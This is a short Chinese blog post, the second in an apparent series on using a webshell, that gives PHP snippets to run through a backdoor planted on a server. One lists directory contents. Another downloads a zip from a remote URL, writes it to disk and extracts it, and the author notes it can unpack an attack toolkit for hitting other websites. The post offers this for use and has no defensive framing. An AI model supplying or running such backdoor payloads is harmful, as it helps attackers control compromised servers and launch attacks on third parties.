MENU

如何优雅的使用你的WebShell II

February 20, 2020 • 网络阅读设置

上篇文章我们介绍了我推荐的WebShell,这篇我们来说说如何通过这个WebShell干一些其他事,这篇文章里我就不说访问啥了,直接放代码

1.使用后门获取目录信息

这个不多说,有PHP基础的应该都会用

$dir =  dirname(__FILE__);$file = scandir($dir);echo " <pre>";print_r($file);

这个dirname(__FILE__)是可以更改为相对路径的,比如你的后门在3层目录中,可以将$dir赋值为../../,所得结果将以一个数组print出来。
像这样

2.使用后门解压,释放文件

这个方法我其实是不想分享出来的。毕竟屡试不爽嘛,其实很简单,代码如下

$down=file_get_contents('http://压缩包下载地址.zip');file_put_contents('update.zip',$down);$zip = new ZipArchive; $zip->open('./update.zip') && $zip->extractTo('../');

这个方法能用来解压可到云之类的在线文件管理,当然,也可以解压个攻击工具包,然后对其它网站进行压测。

其他的东西我就不说了,还有什么其他玩法,我们就笑看大佬了

Last Modified: March 15, 2020
Archives 文章海报
Tip
:D 获取中...
QR Code for this page
Tipping QR Code